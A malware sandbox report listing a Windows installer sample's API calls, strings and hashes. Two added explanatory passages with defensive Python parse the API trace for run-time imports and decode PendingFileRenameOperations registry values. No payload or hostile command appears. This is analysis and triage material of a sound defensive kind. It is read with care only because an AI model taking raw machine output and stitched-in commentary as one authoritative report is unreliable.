  • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
  • Part of subcall function 0041F118: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
  • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
  • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
• String ID: ControlOfs%.8X%.8X$Delphi%.8X
• API String ID: 316262546-2767913252
APIs
• SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
• GetWindowLongA.USER32(?,000000F0), ref: 0041366F
• GetWindowLongA.USER32(?,000000F4), ref: 00413681
• SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
• SetPropA.USER32(?,00000000,00000000), ref: 004136AB
• SetPropA.USER32(?,00000000,00000000), ref: 004136C2
Similarity
• API ID: LongWindow$Prop
• String ID:
• API String ID: 3887896539-0
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045586F,?,00000000,004558AF), ref: 004557B5
Strings
• WININIT.INI, xrefs: 004557E4
• PendingFileRenameOperations2, xrefs: 00455784
• PendingFileRenameOperations, xrefs: 00455754
• SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455738
Similarity
• API ID: CloseOpen
• String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
• API String ID: 47109696-2199428270
APIs
• CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC27
• GetLastError.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC30
Similarity
• API ID: CreateDirectoryErrorLast
• String ID: Created temporary directory: $\_setup64.tmp$_isetup
• API String ID: 1375471231-2952887711
APIs
• EnumWindows.USER32(00423A1C), ref: 00423AA8
• GetWindow.USER32(?,00000003), ref: 00423ABD
• GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
• SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
Similarity
• API ID: Window$EnumLongWindows
• String ID: \AB
• API String ID: 4191631535-3948367934
APIs
• RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE50
• GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFEB,00000000,0042E003,?,?,?,?,00000006,?,00000000,0049785D), ref: 0042DE6B
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE71
Similarity
• API ID: AddressDeleteHandleModuleProc
• String ID: RegDeleteKeyExA$advapi32.dll
• API String ID: 588496660-1846899949
Strings
• PrepareToInstall failed: %s, xrefs: 0046BE6E
• NextButtonClick, xrefs: 0046BC4C
• Need to restart Windows? %s, xrefs: 0046BE95
Similarity
• API ID:
• String ID: Need to restart Windows? %s$NextButtonClick$PrepareToInstall failed: %s
• API String ID: 0-2329492092
APIs
• SetActiveWindow.USER32(?,?,00000000,004833D5), ref: 004831A8
• SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 00483246
Strings
Similarity
• API ID: ActiveChangeNotifyWindow
• String ID: $Need to restart Windows? %s
• API String ID: 1160245247-4200181552
APIs
  • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
• GetLastError.KERNEL32(00000000,0046FCD9,?,?,0049C1E0,00000000), ref: 0046FBB6
• SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 0046FC30
• SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046FC55
Strings
Similarity
• API ID: ChangeNotify$ErrorFullLastNamePath
• String ID: Creating directory: %s
• API String ID: 2451617938-483064649
APIs
• GetProcAddress.KERNEL32(00000000,SfcIsFileProtected), ref: 00454E82
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,00454F48), ref: 00454EEC
Strings
Similarity
• API ID: AddressByteCharMultiProcWide
• String ID: SfcIsFileProtected$sfc.dll
• API String ID: 2508298434-591603554
APIs
• 755A1520.VERSION(00000000,?,?,?,00497900), ref: 00452530
• 755A1500.VERSION(00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 0045255D
• 755A1540.VERSION(?,004525D4,?,?,00000000,?,00000000,?,00000000,004525AB,?,00000000,?,?,?,00497900), ref: 00452577
Strings
Similarity
• API ID: A1500A1520A1540
• String ID: %E
• API String ID: 2563864905-175436132
APIs
• GetDC.USER32(00000000), ref: 0044B401
• SelectObject.GDI32(?,00000000), ref: 0044B424
• ReleaseDC.USER32(00000000,?), ref: 0044B457
Strings
Similarity
• API ID: ObjectReleaseSelect
• String ID: %H
• API String ID: 1831053106-1959103961
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B14C,?,%H,?,?), ref: 0044B11E
• DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B131
• DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B165
Strings
Similarity
• API ID: DrawText$ByteCharMultiWide
• String ID: %H
• API String ID: 65125430-1959103961
APIs
• SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
  • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
  • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
• GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                                                                        • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                        • API String ID: 395431579-1506664499
                                                                                                                                        • Opcode ID: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                                                                        • Instruction ID: e807f919b0f5f47641bb36d66eaae5ab4e0d2818c3cb02d7dc2bc8906116ae4e
                                                                                                                                        • Opcode Fuzzy Hash: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                                                                        • Instruction Fuzzy Hash: 3311A330B00319BBD711EB62FD85B8E7BA8DB55704F90447BF40066291DBB8AE05C65D
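The entry above is the classic run-time import pattern: SetErrorMode(0x8000) sets SEM_NOOPENFILEERRORBOX so that a missing library does not pop a dialog, LoadLibraryA loads it (the argument is not visible in the trace, but the entry's string table carries "shlwapi.dll"), and GetProcAddress resolves "SHAutoComplete" by name. On its own this is how ordinary programs load optional APIs; it becomes interesting when the resolved names are absent from the PE import table, which this entry does not show. The Python below is an added example, not part of the Joe Sandbox report: it parses API call lines in the format printed above (a constructed copy of these five lines is embedded), decodes the SetErrorMode flags using the winbase.h values, and lists every export resolved by name. The function names (parse_trace, dynamic_imports, silent_load) are mine.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed copy of the API call lines printed for this function in the report.
SAMPLE_TRACE = [
    "SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5",
    "Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7",
    "Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E",
    "Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD",
    "GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8",
]

# One report line: optional bullet, optional "Part of subcall function XXXXXXXX:",
# then Api.MODULE(args), ref: XXXXXXXX
CALL_RE = re.compile(
    r"^(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)

# SetErrorMode flags from winbase.h; 0x8000 is the one used by this sample.
SEM_FLAGS = {
    0x0001: "SEM_FAILCRITICALERRORS",
    0x0002: "SEM_NOGPFAULTERRORBOX",
    0x0004: "SEM_NOALIGNMENTFAULTEXCEPT",
    0x8000: "SEM_NOOPENFILEERRORBOX",
}


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str]   # address of the caller when the line is "Part of subcall"


def _is_hex(arg: str) -> bool:
    return re.fullmatch(r"[0-9A-F]{8}", arg) is not None


def parse_trace(lines: List[str]) -> List[Call]:
    """Turn report lines into Call records; lines that do not match are skipped."""
    calls = []
    for line in lines:
        m = CALL_RE.match(line.strip())
        if m:
            calls.append(Call(m["api"], m["mod"], m["args"].split(","), m["ref"], m["sub"]))
    return calls


def decode_error_mode(value_hex: str) -> List[str]:
    """Flag names set in a SetErrorMode argument such as '00008000'."""
    value = int(value_hex, 16)
    return [name for bit, name in sorted(SEM_FLAGS.items()) if value & bit]


def dynamic_imports(calls: List[Call]) -> List[str]:
    """Exports resolved by literal name through GetProcAddress.

    Joe Sandbox prints unknown values as '?' and numbers as 8 hex digits, so any
    second argument that is neither is a real export name (an ordinal would be hex).
    """
    return [c.args[1] for c in calls
            if c.api == "GetProcAddress" and len(c.args) >= 2
            and c.args[1] != "?" and not _is_hex(c.args[1])]


def silent_load(calls: List[Call]) -> bool:
    """True if a LoadLibrary* call follows SetErrorMode with SEM_NOOPENFILEERRORBOX set."""
    suppressed = False
    for c in calls:
        if c.api == "SetErrorMode" and c.args and _is_hex(c.args[0]):
            suppressed = "SEM_NOOPENFILEERRORBOX" in decode_error_mode(c.args[0])
        elif c.api.startswith("LoadLibrary") and suppressed:
            return True
    return False


if __name__ == "__main__":
    trace = parse_trace(SAMPLE_TRACE)
    print("silent load:", silent_load(trace))
    print("resolved by name:", dynamic_imports(trace))
```

Run over the five lines above this prints silent load True and the single name SHAutoComplete; feeding it a whole report's API lists gives the set of names to compare against the static import table.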
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(?,00455A7B,?,00000001,00000000), ref: 00455A6E
Strings
• PendingFileRenameOperations2, xrefs: 00455A4F
• SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A1C
• PendingFileRenameOperations, xrefs: 00455A40
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: CloseOpen
• String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
• API String ID: 47109696-2115312317
• Opcode ID: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
• Instruction ID: e9356c19d9a7d2c1b22529064790e486fb2be540b5bf165494b3782c633fa2c0
• Opcode Fuzzy Hash: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
• Instruction Fuzzy Hash: A3F0F671304A08BFDB04D661DC62A3B739CE744725FB08167F800CB682EA7CBD04915C
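The strings in this entry show the sample opening HKLM\SYSTEM\CurrentControlSet\Control\Session Manager and looking at PendingFileRenameOperations and PendingFileRenameOperations2, which is the usual "is a reboot pending" check; the page shows a read, not a write. The value is a REG_MULTI_SZ of source/target pairs that MoveFileEx(MOVEFILE_DELAY_UNTIL_REBOOT) writes: an empty target means delete on reboot, a target starting with "!" means replace an existing file, and paths carry the NT "\??\" prefix. Because the same mechanism is used to remove or swap files after a reboot, a parser for it is worth having during triage. The one below is an added example, not code from the report or the sample; the byte string it parses is constructed here, and the layout of PendingFileRenameOperations2 is assumed to be the same (the page does not say how the sample treats it). The names PendingOp, parse_pending_file_rename and build_value are mine.

```python
from dataclasses import dataclass
from typing import List, Tuple

NT_PREFIX = "\\??\\"   # MoveFileEx stores NT-namespace paths in the registry


@dataclass
class PendingOp:
    kind: str      # "delete", "rename" or "replace"
    source: str    # Win32 path (NT prefix removed)
    target: str    # "" for delete


def nt_to_win32(path: str) -> str:
    """Strip the NT namespace prefix so the path is usable as a Win32 path."""
    return path[len(NT_PREFIX):] if path.startswith(NT_PREFIX) else path


def parse_pending_file_rename(raw: bytes) -> List[PendingOp]:
    """Decode a REG_MULTI_SZ PendingFileRenameOperations blob into operations.

    Strings are UTF-16LE, each NUL-terminated, with one extra NUL closing the
    list. A delete entry is a source followed by an empty string, so the blob
    cannot be split like an ordinary multi-string; it is read as a flat list
    of NUL-terminated strings and paired up.
    """
    text = raw.decode("utf-16-le")
    if not text:
        return []
    if text.endswith("\x00"):
        text = text[:-1]            # list terminator (second NUL of the double NUL)
    parts = text.split("\x00")
    if text.endswith("\x00"):
        parts.pop()                 # empty remainder after the last string's own NUL
    ops = []
    it = iter(parts)
    for src in it:
        dst = next(it, "")          # an unpaired trailing source is treated as a delete
        if dst == "":
            ops.append(PendingOp("delete", nt_to_win32(src), ""))
        elif dst.startswith("!"):   # MOVEFILE_REPLACE_EXISTING marker
            ops.append(PendingOp("replace", nt_to_win32(src), nt_to_win32(dst[1:])))
        else:
            ops.append(PendingOp("rename", nt_to_win32(src), nt_to_win32(dst)))
    return ops


def build_value(pairs: List[Tuple[str, str]]) -> bytes:
    """Encode pairs the way the registry stores them; used only to construct sample data."""
    flat = [s for pair in pairs for s in pair]
    return ("\x00".join(flat) + "\x00\x00").encode("utf-16-le")


# Constructed sample: one delete-on-reboot entry and one replace-existing entry.
SAMPLE_VALUE = build_value([
    ("\\??\\C:\\Temp\\setup.tmp", ""),
    ("\\??\\C:\\Program Files\\App\\app.exe.new", "!\\??\\C:\\Program Files\\App\\app.exe"),
])

if __name__ == "__main__":
    for op in parse_pending_file_rename(SAMPLE_VALUE):
        print(f"{op.kind:8} {op.source} -> {op.target or '(delete on reboot)'}")
```

On a live system the bytes come from reading the value with type REG_MULTI_SZ; anything in the list that points at security tooling, or at a file a suspicious process just dropped, is the thing to look at before the host reboots.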
APIs
• FindNextFileA.KERNEL32(000000FF,?,00000000,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472301
• FindClose.KERNEL32(000000FF,0047232C,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 0047231F
• FindNextFileA.KERNEL32(000000FF,?,00000000,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472423
• FindClose.KERNEL32(000000FF,0047244E,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 00472441
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Find$CloseFileNext
• String ID:
• API String ID: 2066263336-0
• Opcode ID: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
• Instruction ID: ff38abb04fb96460afd2c3532f2e87b2ffc4f25b99c166b2ff4046d92e8ebf4f
• Opcode Fuzzy Hash: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
• Instruction Fuzzy Hash: 3EC14C3490424D9FCF11DFA5C981ADEBBB8FF49304F5080AAE808B3251D7789A46CF58
APIs
• FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?,00000000), ref: 0047FD9E
• FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?), ref: 0047FDAB
• FindNextFileA.KERNEL32(000000FF,?,00000000,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147), ref: 0047FEA0
• FindClose.KERNEL32(000000FF,0047FECB,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?), ref: 0047FEBE
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Find$CloseFileNext
• String ID:
• API String ID: 2066263336-0
• Opcode ID: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
• Instruction ID: 5570db9595827249690d4c596f970be035a6cb65fb6c4bc3b070d2a6e7e06d26
• Opcode Fuzzy Hash: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
• Instruction Fuzzy Hash: 34512D71A006499FCB21DF65CC45ADEB7B8EB88319F1084BAA818A7351D7389F89CF54
APIs
• GetMenu.USER32(00000000), ref: 00421361
• SetMenu.USER32(00000000,00000000), ref: 0042137E
• SetMenu.USER32(00000000,00000000), ref: 004213B3
• SetMenu.USER32(00000000,00000000), ref: 004213CF
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Menu
• String ID:
• API String ID: 3711407533-0
• Opcode ID: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
• Instruction ID: 68e231870b0c3442489bede8fdcf2aa1db34e154331db007d9f14f65c1163b63
• Opcode Fuzzy Hash: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
• Instruction Fuzzy Hash: 4641AE3070425447EB20EA3AA9857AB36925B20308F4841BFFC40DF7A3CA7CDD45839D
APIs
• SendMessageA.USER32(?,?,?,?), ref: 00416B84
• SetTextColor.GDI32(?,00000000), ref: 00416B9E
• SetBkColor.GDI32(?,00000000), ref: 00416BB8
• CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BE0
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Color$CallMessageProcSendTextWindow
• String ID:
• API String ID: 601730667-0
• Opcode ID: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
• Instruction ID: 4ea48ea5c9b96bae81565ca4ce64eb356f32bd46963e120bc97d04dec40f2685
• Opcode Fuzzy Hash: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
• Instruction Fuzzy Hash: BC115171705604AFD710EE6ECC84E8777ECEF49310715887EB959CB612C638F8418B69
APIs
• GetDC.USER32(00000000), ref: 0042311E
• EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
• ReleaseDC.USER32(00000000,00000000), ref: 00423144
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: CapsDeviceEnumFontsRelease
• String ID:
• API String ID: 2698912916-0
• Opcode ID: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
• Instruction ID: a9d24610abdaa6694e735d00c6d38f20457f2ac5f1468c421a1b182fb2ef8db9
• Opcode Fuzzy Hash: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
• Instruction Fuzzy Hash: 8D01CC716042102AE700BF6A5C82B9B3AA49F01319F40027BF808AA3C6DA7E980547AE
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                                                        • FlushFileBuffers.KERNEL32(?), ref: 0045C499
                                                                                                                                        Strings
                                                                                                                                        • NumRecs range exceeded, xrefs: 0045C396
                                                                                                                                        • EndOffset range exceeded, xrefs: 0045C3CD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                         • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                         • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$BuffersFlush
                                                                                                                                        • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                                                                        • API String ID: 3593489403-659731555
                                                                                                                                        • Opcode ID: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                                                                        • Instruction ID: 69b4fe9c868b7cadc716880164946defc5db249b4b2908964217ac1dcc813941
                                                                                                                                        • Opcode Fuzzy Hash: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                                                                        • Instruction Fuzzy Hash: 4F617334A002588FDB25DF25C891AD9B7B5AF49305F0084DAED88AB353D674AEC8CF54
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                                                                                                          • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                                                                                                          • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                                                                          • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                                                                          • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                                                                          • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                                                                          • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                                                                          • Part of subcall function 004063C4: 6FDA1CD0.COMCTL32(00498BC5), ref: 004063C4
                                                                                                                                          • Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
                                                                                                                                          • Part of subcall function 00419040: GetVersion.KERNEL32(00498BDE), ref: 00419040
                                                                                                                                          • Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                                                                          • Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
